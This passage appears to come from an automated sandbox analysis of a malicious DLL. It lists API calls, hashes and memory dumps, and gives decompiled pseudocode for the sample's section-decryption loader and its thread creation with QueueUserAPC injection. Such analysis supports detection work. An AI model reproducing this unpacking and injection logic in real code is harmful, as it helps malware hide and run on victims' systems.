Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: dea9fd856cb932d0d46adab0f052b7f59e55f1622551324ea3261585f3dfd180
Instruction ID: fa3b9daee3f18e41012d57f57573ee97e85f099d92543b5d3c1c69d558b19e5c
Opcode Fuzzy Hash: dea9fd856cb932d0d46adab0f052b7f59e55f1622551324ea3261585f3dfd180
Instruction Fuzzy Hash: 3BC19130E28289CEDF21DFA8C590FECBBB6AF86304F25455DC8956B346C7249D46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B7C1D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6D4B7CAD

Strings

pow, xrefs: 6D4B7C85, 6D4B7CA2

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: b507c0f053975e56e87fd173f75c81c7c0f6851c0b1bc3c218f23fc8b76da5d9
Instruction ID: 771380e0f8fc9e27472e3a77cf89ef2e8e80128af332eeb17585f8d318386dda
Opcode Fuzzy Hash: b507c0f053975e56e87fd173f75c81c7c0f6851c0b1bc3c218f23fc8b76da5d9
Instruction Fuzzy Hash: 42514765E1C703A7CB02BB24C990F7A3BB4AB51741F31C95CE0A542398EB358C959E97

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C22D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4C2348

Strings

HTm, xrefs: 6D4C2315
DTm, xrefs: 6D4C2303

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: DTm$HTm
API String ID: 269201875-2435632002
Opcode ID: 701ea36ba41664b29755a8d84a86935d987f31d6dbd838bd5979870aa9e168a7
Instruction ID: af1f8f997447600e55b5ebc96017d885417481b4998f513798888fbb771f9472
Opcode Fuzzy Hash: 701ea36ba41664b29755a8d84a86935d987f31d6dbd838bd5979870aa9e168a7
Instruction Fuzzy Hash: 2D11B4791083029FE770CF3DD480F5677E8EB167A8B30942EE5998B651DBB19C4187A2

Uniqueness

Uniqueness Score: -1.00%

Function 6D47B267, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,6D476FA5,00000001,6D4FBC90,6D453DBA,00000000,?,6D4533B4,6D55A9D8,6D461B20,6D55AA00,6D453DBA,6D4FBC90,00000001,6D4FBC90), ref: 6D47B2EB

Strings

ios_base::failbit set, xrefs: 6D47B26A

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: ios_base::failbit set
API String ID: 1452528299-3924258884
Opcode ID: b39ed234d45b2ee9e424e95ca85166834d63181747981e296df365c69ae2a53b
Instruction ID: e8b389e8d7a93fc17d91a94b60fcd5ffb24940e99543250d3c3390aa8d1685eb
Opcode Fuzzy Hash: b39ed234d45b2ee9e424e95ca85166834d63181747981e296df365c69ae2a53b
Instruction Fuzzy Hash: E611CE3630511AAFCF239E69CC48EAEBB75FF09311B128039F929D6610DB319C118BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5F71, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,97F0AF70,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,97F0AF70,?), ref: 6D4C6007
GetLastError.KERNEL32 ref: 6D4C6015
MultiByteToWideChar.KERNEL32(?,00000001,?,?,97F0AF70,00000000), ref: 6D4C6070

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 9913c227536c78462932614380c823e4a9c5270c2b72d13ae8c883c3b2a77e52
Instruction ID: 61d72aef1f7ea1925916033413172f8c401f68437eba1a38f4e8ca5d94da0ca8
Opcode Fuzzy Hash: 9913c227536c78462932614380c823e4a9c5270c2b72d13ae8c883c3b2a77e52
Instruction Fuzzy Hash: 0B41E739604216AFDB11CF6AC844F7A7BB5EF03314F21C25DE958672A1DB318D42C7A2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6464 Parent PID: 6444 rundll32.exeCOMMON

Executed Functions

Function 6D541746, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000727,00003000,00000040,00000727,6D5411A0), ref: 6D541803
VirtualAlloc.KERNEL32(00000000,00000269,00003000,00000040,6D5411FF), ref: 6D54183A
VirtualAlloc.KERNEL32(00000000,0000FDA6,00003000,00000040), ref: 6D54189A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D5418D0
VirtualProtect.KERNEL32(6D450000,00000000,00000004,6D541725), ref: 6D5419D5
VirtualProtect.KERNEL32(6D450000,00001000,00000004,6D541725), ref: 6D5419FC
VirtualProtect.KERNEL32(00000000,?,00000002,6D541725), ref: 6D541AC9
VirtualProtect.KERNEL32(00000000,?,00000002,6D541725,?), ref: 6D541B1F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D541B3B

Memory Dump Source

Source File: 00000002.00000002.908200171.000000006D541000.00000040.00020000.sdmp, Offset: 6D541000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 51fdc63658de21ca3e7fc03ac4ccf3f5394230b99318a8f87d8b36649fad153b
Instruction ID: f7a2219c029a6e30627772013bc5bffe79b596495374d6d89080f693d5f975b7
Opcode Fuzzy Hash: 51fdc63658de21ca3e7fc03ac4ccf3f5394230b99318a8f87d8b36649fad153b
Instruction Fuzzy Hash: 75D17DB2600241AFDB25CF54C880F5177B6FF88310B198696ED499FA9AD77CBC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D45163F, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6D45163F(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6D451850();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6D4518F4(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6D4512DC(E6D45135A,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6D451538(_t44,  &_a4) != 0) {
					 *0x6d454138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t48 =  *_t55(_t43, 0, 0);
				if(_t48 == 0) {
					L9:
					 *0x6d454138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6D451DE1(_t48 + _t14);
				 *0x6d454138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48);
				E6D451DFC(_t43);
				goto L11;
			}

0x6d451646
0x6d45164f
0x6d451652
0x6d451742
0x6d451742
0x6d451659
0x6d45165d
0x6d451663
0x6d451671
0x6d451672
0x6d451675
0x6d451678
0x6d451681
0x6d451684
0x6d45168a
0x6d45168d
0x6d451694
0x6d45173f
0x00000000
0x6d45173f
0x6d45169e
0x6d4516ef
0x6d4516ef
0x6d451705
0x6d45170a
0x6d451732
0x6d45170c
0x6d45170f
0x6d451717
0x6d45171a
0x6d451721
0x6d451721
0x6d451728
0x6d451728
0x6d451735
0x6d45173b
0x6d45173d
0x6d45173d
0x00000000
0x6d45173b
0x6d4516ab
0x6d4516e9
0x00000000
0x6d4516e9
0x6d4516ad
0x6d4516b0
0x6d4516bb
0x6d4516bf
0x6d4516e1
0x6d4516e1
0x00000000
0x6d4516e1
0x6d4516c1
0x6d4516c6
0x6d4516cd
0x6d4516d2
0x00000000
0x00000000
0x6d4516d7
0x6d4516da
0x00000000

APIs

Part of subcall function 6D451850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D45164B,73B763F0), ref: 6D45185F
Part of subcall function 6D451850: GetVersion.KERNEL32 ref: 6D45186E
Part of subcall function 6D451850: GetCurrentProcessId.KERNEL32 ref: 6D451885
Part of subcall function 6D451850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D45189E

GetSystemTime.KERNEL32(?,00000000,73B763F0), ref: 6D45165D
SwitchToThread.KERNEL32 ref: 6D451663

Part of subcall function 6D4518F4: VirtualAlloc.KERNELBASE(00000000,6D45167D,00003000,00000004,?,?,6D45167D,00000000), ref: 6D45194A
Part of subcall function 6D4518F4: memcpy.NTDLL(?,?,6D45167D,?,?,6D45167D,00000000), ref: 6D4519DC
Part of subcall function 6D4518F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6D45167D,00000000), ref: 6D4519F7

Sleep.KERNELBASE(00000000,00000000), ref: 6D451684
GetLongPathNameW.KERNEL32 ref: 6D4516B9
GetLongPathNameW.KERNEL32 ref: 6D4516D7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6D45170F
GetExitCodeThread.KERNEL32(00000000,?), ref: 6D451721
CloseHandle.KERNEL32(00000000), ref: 6D451728
GetLastError.KERNEL32(?,00000000), ref: 6D451730
GetLastError.KERNEL32 ref: 6D45173D

Memory Dump Source

Source File: 00000002.00000002.908012543.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000002.00000002.908006075.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908018975.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908028737.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.908034339.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: db5d8e3cad159647c32c1dcb7c448bcf68237a01590059412e953c12c9b9bc6f
Instruction ID: 645f73bcaa7fcf7d76b7625dd5c70977d8747f86038507f19c369625ded2afc6
Opcode Fuzzy Hash: db5d8e3cad159647c32c1dcb7c448bcf68237a01590059412e953c12c9b9bc6f
Instruction Fuzzy Hash: 4E318671900216ABCF10EFA98C88FAF77BDEF45750B254226E915D7240E734DE20CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D451AFA, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6d454108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6d45410c;
						if( *0x6d45410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1); // executed
								__eflags =  *0x6d454118;
								if( *0x6d454118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d45410c);
						}
						HeapDestroy( *0x6d454110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d454108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6d454110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d454130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6D4512DC(E6D45111A, E6D4515EE(_a12, 1, 0x6d454118, _t41));
							 *0x6d45410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6d451afd
0x6d451b09
0x6d451b0b
0x6d451b0e
0x6d451b84
0x6d451b8a
0x6d451b8c
0x6d451b8e
0x6d451b94
0x6d451b96
0x6d451b9b
0x6d451b9e
0x6d451ba9
0x6d451bab
0x00000000
0x00000000
0x6d451bad
0x6d451bb0
0x6d451bb2
0x00000000
0x00000000
0x00000000
0x6d451bb2
0x6d451bba
0x6d451bba
0x6d451bc6
0x6d451bc6
0x6d451b10
0x6d451b11
0x6d451b31
0x6d451b37
0x6d451b39
0x6d451b3e
0x6d451b7a
0x6d451b7a
0x6d451b40
0x6d451b48
0x6d451b4f
0x6d451b59
0x6d451b65
0x6d451b6c
0x6d451b71
0x6d451b76
0x00000000
0x6d451b76
0x6d451b71
0x6d451b3e
0x6d451b11
0x6d451bd3

APIs

InterlockedIncrement.KERNEL32(6D454108), ref: 6D451B1C
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6D451B31

Part of subcall function 6D4512DC: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D454118,6D451B6A), ref: 6D4512F3
Part of subcall function 6D4512DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D451308
Part of subcall function 6D4512DC: GetLastError.KERNEL32(00000000), ref: 6D451313
Part of subcall function 6D4512DC: TerminateThread.KERNEL32(00000000,00000000), ref: 6D45131D
Part of subcall function 6D4512DC: CloseHandle.KERNEL32(00000000), ref: 6D451324
Part of subcall function 6D4512DC: SetLastError.KERNEL32(00000000), ref: 6D45132D

InterlockedDecrement.KERNEL32(6D454108), ref: 6D451B84
SleepEx.KERNELBASE(00000064,00000001), ref: 6D451B9E
CloseHandle.KERNEL32 ref: 6D451BBA
HeapDestroy.KERNEL32 ref: 6D451BC6

Memory Dump Source

Source File: 00000002.00000002.908012543.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000002.00000002.908006075.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908018975.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908028737.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.908034339.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 30b72d9a6d3af2cc741b7c43902e96941a73911a4cf1b6e776ea94bdc4ab21fc
Instruction ID: addabae2917a3518b9afef1f6a8c6323e6e4665ecc0981343644e6b6cd927df7
Opcode Fuzzy Hash: 30b72d9a6d3af2cc741b7c43902e96941a73911a4cf1b6e776ea94bdc4ab21fc
Instruction Fuzzy Hash: A8215E75600246ABDF00AF69C888F6A7BF4FB6A7A47214529F519D7241E734CD208B50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4512DC, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4512DC(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6d45414c, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6d4512f3
0x6d4512f9
0x6d4512fd
0x6d451308
0x6d451310
0x6d451319
0x6d45131d
0x6d451324
0x6d45132b
0x6d45132d
0x6d451333
0x6d451310
0x6d451337

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D454118,6D451B6A), ref: 6D4512F3
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D451308
GetLastError.KERNEL32(00000000), ref: 6D451313
TerminateThread.KERNEL32(00000000,00000000), ref: 6D45131D
CloseHandle.KERNEL32(00000000), ref: 6D451324
SetLastError.KERNEL32(00000000), ref: 6D45132D

Memory Dump Source

Source File: 00000002.00000002.908012543.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000002.00000002.908006075.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908018975.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908028737.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.908034339.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 2a497b95c8e2619a7315858a93bc0e9a80a0d644fd39fc7cb9781f589e9a0f03
Instruction ID: cd61cb231e81aa8d131fce3b95e014e89f27d768910a457b0f28cb6615435925
Opcode Fuzzy Hash: 2a497b95c8e2619a7315858a93bc0e9a80a0d644fd39fc7cb9781f589e9a0f03
Instruction Fuzzy Hash: 76F0F832205721FBDB12AFA08C4CF9FBB79FB0AB61F114604FA0595154D731CC209BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4518F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D4518F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6d454130;
				_t39 = E6D451F5D(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6d45414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6d4551a7; // 0x6d4551a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6D4518C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6d45414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x6d4518fb
0x6d45190b
0x6d451912
0x6d451915
0x6d45192a
0x6d451931
0x6d451936
0x6d451947
0x6d45194a
0x6d451952
0x6d451955
0x6d4519ff
0x6d45195b
0x6d45195b
0x6d45195f
0x6d4519c7
0x6d451961
0x6d451961
0x6d451964
0x6d451966
0x6d45196e
0x6d451971
0x6d451974
0x6d45197c
0x6d451984
0x6d451985
0x6d451986
0x6d45198d
0x6d45198d
0x6d4519a1
0x6d4519a6
0x6d4519af
0x6d4519b6
0x6d4519b9
0x6d4519bd
0x6d4519c2
0x00000000
0x00000000
0x6d451979
0x6d451979
0x6d4519c4
0x6d4519d1
0x6d4519e6
0x6d4519d3
0x6d4519dc
0x6d4519e1
0x6d4519f7
0x6d4519f7
0x6d451a06
0x6d451a0c

APIs

VirtualAlloc.KERNELBASE(00000000,6D45167D,00003000,00000004,?,?,6D45167D,00000000), ref: 6D45194A
memcpy.NTDLL(?,?,6D45167D,?,?,6D45167D,00000000), ref: 6D4519DC
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6D45167D,00000000), ref: 6D4519F7

Strings

Mar 9 2021, xrefs: 6D45197C

Memory Dump Source

Source File: 00000002.00000002.908012543.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000002.00000002.908006075.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908018975.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908028737.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.908034339.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 9 2021
API String ID: 4010158826-2159264323
Opcode ID: 0a2866caed10b318e8e414a172e1bc8af9239ceed74b46b1447b2e88b978bdcd
Instruction ID: 415ad9aca943c47ab64d5a1ef2cd4302a03a190767f53ef02fa9cf659d7dcad8
Opcode Fuzzy Hash: 0a2866caed10b318e8e414a172e1bc8af9239ceed74b46b1447b2e88b978bdcd
Instruction Fuzzy Hash: ED315375E0021A9FDF01DF99C880FAEBBB5BF4A704F108168D504BB244D771AE15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D45111A, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D45111A(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6D45163F(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6d451123
0x6d451128
0x6d451136
0x6d45113b
0x6d45113b
0x6d451141
0x6d451146
0x6d45114a
0x6d45114e
0x6d45114e
0x6d451158
0x6d451161

APIs

GetCurrentThread.KERNEL32 ref: 6D45111D
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6D451128
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6D45113B
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D45114E

Memory Dump Source

Source File: 00000002.00000002.908012543.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000002.00000002.908006075.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908018975.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908028737.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.908034339.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 496836c75ec0c7e6e4674cb2d8ccbce0c48f5d1f09b3b34a77d35bd11dd49069
Instruction ID: 7023fddc97f040924c98ac6c7e68329de993e25b916869f9b7c63427f0cebbe1
Opcode Fuzzy Hash: 496836c75ec0c7e6e4674cb2d8ccbce0c48f5d1f09b3b34a77d35bd11dd49069
Instruction Fuzzy Hash: D4E092312053116BE6027A298C88F6B776CDF96770B120335F521D22D4CB64CC228AA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BF58C, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D4BF5CD

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b3b739c4c03cc171a6a2512c26b0fd25f2567916fff8ce69eca33b8b3c58218e
Instruction ID: d7c3b021a5854b0cad3682e518e2aa0937773d0542cd68e65697bf0651ad2ccd
Opcode Fuzzy Hash: b3b739c4c03cc171a6a2512c26b0fd25f2567916fff8ce69eca33b8b3c58218e
Instruction Fuzzy Hash: 02F0243D65F126A7EB015E2A8C04F1A3798AF717B0B228016EC1CD6281DF31EC0186F0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4773C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 6D4773E8

Part of subcall function 6D478A3D: std::_Lockit::_Lockit.LIBCPMT ref: 6D478A4F
Part of subcall function 6D478A3D: std::locale::_Setgloballocale.LIBCPMT ref: 6D478A6A
Part of subcall function 6D478A3D: _Yarn.LIBCPMT ref: 6D478A80
Part of subcall function 6D478A3D: std::_Lockit::~_Lockit.LIBCPMT ref: 6D478AC0

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 238635018-0
Opcode ID: 3fb33257ae8c81fb0af646fa2067f6f1b85dd33568fd6f6f967d4cb5e3726680
Instruction ID: 0ea63edf627e76353725df574c67782d1d9c5ad45ce826082993449d712a0eb9
Opcode Fuzzy Hash: 3fb33257ae8c81fb0af646fa2067f6f1b85dd33568fd6f6f967d4cb5e3726680
Instruction Fuzzy Hash: A7E0DF32E0D622CBD3309B6A8001FACAB81AB40B94FA2001ED7009F680CBB44C4087D2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4CDE61, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
